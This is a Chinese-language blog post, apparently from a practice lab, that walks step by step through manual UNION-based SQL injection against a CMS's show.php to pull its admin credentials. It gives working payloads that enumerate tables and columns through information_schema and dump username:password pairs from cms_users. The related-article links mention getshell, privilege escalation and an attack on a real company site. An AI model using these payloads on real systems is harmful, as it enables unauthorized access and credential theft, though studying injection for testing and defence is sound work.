SQL注入----利用联合查询获取 cms 网站后台管理员账密

最新推荐文章于 2024-05-09 13:06:06 发布
最新推荐文章于 2024-05-09 13:06:06 发布
阅读量93 收藏
点赞数
分类专栏: 通用漏洞#SQL注入 文章标签: sql 数据库 mysql 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ssdok1o2/article/details/132438601
版权

相关知识点补充

关于MySQL注入的相关知识

在 mysql5 版本以后,mysql 默认在数据库中存放在一个叫 infomation_schema 里面 这个库里面有很多表;
重点是有三个columns 、tables、SCHEMATA 表字段, CHEMA_NAME 记录着库的信息

tables 表字段 TABLE_SCHEMA 、TABLE_NAME 分别记录着库名和表名
columns 存储该用户创建的所有数据库的库名、表名和字段名(列名)。

 

通过 infomation_schema 查询 www_dvwa_com 库里所有的表和字段
select * from information_schema.`COLUMNS` where TABLE_SCHEMA='www_dvwa_com'
(数 据 库 . 表 名)  这 种 查 询 方 法 是 指 定 某 个 数 据 库 某 个 表
`` 这 个 符 号 可 以 忽 略 不 用

 

union 联合注入原理
联合查询注入是联合两个表进行注入攻击,使用关键词 union select 对两个表进行联合查询。两个表的字段要数要相同,不然会出现报错。
该注入方法适用数据库中的内容会回显到页面中来的情况。联合查询就是利用union select语句,该语句会同时执行两条select语句,实现跨库、跨表查询。

具体步骤演示

  • SQL注入流程

数据库-->表-->列-->数据(字段)

1.判断是否存在注入点

由下图可以看到页面有回显,且显示报错 可以考虑联合查询注入和报错注入,但又考虑到注入成本,所以优先考虑使用联合查询注入

2.在确认存在注入点时,使用order by 判断数据库中的列数

判断数据库列数为15列

3.判断出回显位 

法一:把第一条select语句的查询条件置为假。

http://10.9.75.31/cms/show.php?id=34 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

法二:利用null  使用单引号依次对null位进行按位测试  若页面回显null则判断其为回显位

http://10.9.75.31/cms/show.php?id=34 and 1=2 UNION SELECT null,null,null,null,null,null,null,null,null,null,null,null,null,null,null

4.查询数据库、版本号

  • 数据库

  • 版本号

  • 用户名

5.查询对应表名

id=-34 union select 1,2,3,4,5,6,7,8,9,10,hex(group_concat(table_name)),12,13,14,15 from information_schema.tables where table_schema=database()

6.查询对应列名

id=-33 union select 1,2,3,4,5,6,7,8,9,10,hex(group_concat(column_name)),12,13,14,15 from information_schema.columns where table_schema=database() and table_name='cms_users'

7.查询数据

union select 1,2,3,4,5,6,7,8,9,10,concat(username,':',password),12,13,14,15 from cms_users

along_sir
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
W78CMS企业网站管理系统 v2.9 UTF-8.rar
07-05
SQL注入后台可设置SQL注入参数等,SQL注入记录,可封锁攻击者IP等。 SMTP邮件配置:新增邮件配置,会员投递简历可直接到邮箱。 后台登陆记录:可查看管理员登陆的相关记录、IP、登陆时间等。 单页管理:单...
3-6SQL注入网站实例第五步:攻破后台获取web管理员权限
山兔的博客
02-15 2430
当我们得到上位点之后,并且对上位点进行了充分的测试,测试的目标是得到了确认的信息,它是可以显示我们想要的数据库信息,所有的表信息,所有的字段信息,甚至,我们可以得到后台管理员的权限,那么本篇,我们就来解决这个问题 用上位点进行爆库,获得后台管理员的权限 1.获得当前连接的所有数据库名 我们仍然对这个上位点,进行测试,我们要查询所有数据库,我们对information_schema下的schemata表,其它的我们暂时留空,留空这里我们用单引号括起来, https://61.206.45.132/corp/
熊海CMS网站SQL注入、XSS攻击、cookie篡改
m0_63917373的博客
11-01 1690
熊海CMS sqlmap工具 SQL注入 XSS cookie篡改
cms文件管理系统靶场的手动SQL注入
qq_42589016的博客
06-17 1601
CSM文件管理系统SQL注入
SQL注入-基于MySQL注入提权(十七)
Gjqhs的博客
02-22 3029
实验目的 普及结合dll文件对Windows系统进行UDF提权,掌握UDF提权的基本思路,熟悉UDF提权的主要方法。PS:面试时不要说打靶场什么东西,就说创建用户,文件执行什么之类的 基本概念 提权 通过某种方式将低权限用户提升为高权限用户的过程。 注入提权 一般指的是在掌控了某数据库户的情况下,通过SQL注入等方式提升该户的权 限,进而夺得服务器(操作系统)的控制权 Windows2003操作系统—一默认用户 System:本地机器上拥有最高权限的用户,普通用户管理工具查看不到 Adminis
掌控靶场 尤里复仇回归sql-注入绕过防护getshell
sagat110的博客
12-27 505
央企扫地僧重拾渗透,在掌控学院的靶场练习闯关过程中,记录一些心得体会,信息收集、sql注入、弱口令、一句话木马等手段的综合用,成功拿到flag
86CMS企业网站管理系统 2011.SP7 UTF-8.zip
07-05
安全设置:SQL注入管理,后台可设置SQL注入参数等,SQL注入记录,可封锁攻击者IP等。 邮件配置:SMTP邮件配置。 分公司部门子网站管理:分公司信息聚合显示,达到小型子网站效果。 后台登陆记录:可查看管理员...
74CMS 3.0 SQL注入漏洞后台.docx
07-07
74CMS 3.0 SQL注入漏洞后台演示,sqlmap与burpsuit注入,需具备php基础
86CMS企业网站管理系统 2011 SP7 UTF-8
04-30
安全设置:SQL注入管理,后台可设置SQL注入参数等,SQL注入记录,可封锁攻击者IP等。 邮件配置:SMTP邮件配置。 分公司部门子网站管理:分公司信息聚合显示,达到小型子网站效果。 后台登陆记录:可查看管理员...
W78CMS企业网站管理系统(中英繁三语版) v140424.rar
07-05
SQL注入后台可设置SQL注入参数等,SQL注入记录,可封锁攻击者IP等。 SMTP邮件配置:新增邮件配置,会员投递简历可直接到邮箱。 后台登陆记录:可查看管理员登陆的相关记录、IP、登陆时间等。 单页管理:单...
SQL注入漏洞登录后台的实现方法
主题模板站的博客
01-22 2017
注意到了没有,我们直接将用户提交过来的数据(用户名和码)直接拿去执行,并没有实现进行特殊字符过滤,待会你们将明白,这是致命的。用户名:
渗透测试公司之实战SQL注入拿下网站权限
网站安全资讯
12-08 2299
近来,sql注入、xss和文件上传漏洞,成功getshell的一个客户网站(必须要拿到客户授权渗透测试许可证明才可以,不得违法入侵),这里简单记录一下整个过程,与...
Web渗/透/攻/击实战(1)—成功渗/透台湾某净化设备公司官网
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
01-08 1394
写在前面 作为一个防御型白帽黑客​ 你一定要知道黑客的进攻套路 才能有相应的防御措施 声明:只做测试,发现对方的漏洞,并不进行破坏性操作 1、 网站分析 地址:http://www.xxx.com.tw/ 这是一家中国台湾地区的网站,看着满屏的繁体字,就不是很舒服 网站首页包括:关于我们、资料下载、联络方式等等。 这些对我们进行sql注入用处并不大 我们需要的是可以进行参数传入的页面,这样我们就可以在参数里做文章 找一下 有没有新闻列表相关的页面 页...
SQL语句手工注入 联合查询获取cms网站后台管理员
干铮的博客
07-27 391
1.修改ID参数判断是否有回显 2. 添加单引号【'】,判断数据库是否有报错 3. 根据报错信息判断输入的数据是字符型还是数字型? 字符型就意味着参数左右两边有引号(单引号和双引号) 数字型就意味着数字参数左右两边没有引号。 关于引号的闭合 【?id=5' and 1=10000 --+】 4.是否会回显报错信息? 考虑到报错注入 5.判断是否有布尔类型状态? 6.判断是否有延时? 常用语句和函数 information_schema 1. ..
CMS漏洞渗透并获取某服务器权限
热门推荐
wodafa的博客
03-14 1万+
在phpmyadmin漏洞与用专题中,我们从多个角度介绍了如何获取webshell并获取服务器权限的案例和情形,但在实际渗透过程中还有一种情况,即服务器上存在phpMyAdmin,且获取了root帐号和码,但无法执行load_file或者说无法导出webshell到服务器上,在这种情况下就需要充分用既有CMS漏洞,通过CMS漏洞来获取webshell。目前使用流行架构,特别是一键式部署的系统
齐博cms最新SQL注入网站漏洞 可远程执行代码提权
weixin_33737134的博客
10-25 945
齐博cms整站系统,是目前建站系统用的较多的一款CMS系统,开源,免费,第三方扩展化,界面可视化的操作,使用简单,便于新手使用和第二次开发,受到许多站长们的喜欢。开发架构使用的是php语言以及mysql数据库,强大的网站并发能力。于近日,我们SINE安全公司发现齐博cms又爆出高危的sql注入漏洞,关于该网站漏洞的详情,我们来详细的分析漏洞的产生以及如何...
sql注入获取网站后台管理员号与
longanquan的博客
07-27 1万+
联合查询获取cms 网站后台管理员 环境介绍 物理机:Firefox浏览器(上加入hackbar插件) win2008虚拟机:搭建有cms网站(不会搭建的可以看我前面的博客) 判断网站是否存在sql注入漏洞 我们用物理机的Firefox浏览器访问虚拟机上的cms网站,F12打开开发者工具,在后面可以看到hackbar工具,点到该工具窗口。 首先我们先用最简单的方法判断是否存在漏洞。我们需要把地址框中的内容复制到hackbar框中,更改id的值,如果数据库中的内容回显到网页中,说明存在漏洞。 很
通过SQL注入拿到管理员
qq_52337463的博客
01-14 4060
该靶场来自于(封神台封神台 - 掌控安全在线演练靶场,是一个在线黑客攻防演练平台。 首先我们看下题目 题目是通过SQL注入拿到管理员后台码 我们先点开"传送门"打开靶场 靶场已经打开了,我们先点"点击查看新闻"打开页面 看起来没啥有用的信息但是别慌,我们先进行SQL注入 在URL中***/?id=1 后面写命令进行注入 and 1=2 union select 1,concat(username,',',password) from admin 这里的admin...
继续SQL
最新发布
qq_47966193的博客
05-09 509
● 例如:datediff('2021-06-08','2021-06-01')返回7,datediff('2021-06-08 23:59:59','2021-06-01 21:00:00')返回7,datediff('2021-06-01','2021-06-08')返回-7。● 例如:year('2021-08-03')返回2021,month('2021-08-03')返回8,day('2021-08-03')返回3。
sql注入-pikachu靶场
10-13
SQL注入是一种常见的Web应用程序漏洞,攻击者可以通过构造恶意的SQL语句来获取或篡改数据库中的数据。在Pikachu靶场中,可以通过注入恶意的SQL语句来获取管理员户的码。具体步骤如下: 1. 在登录页面输入用户名...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值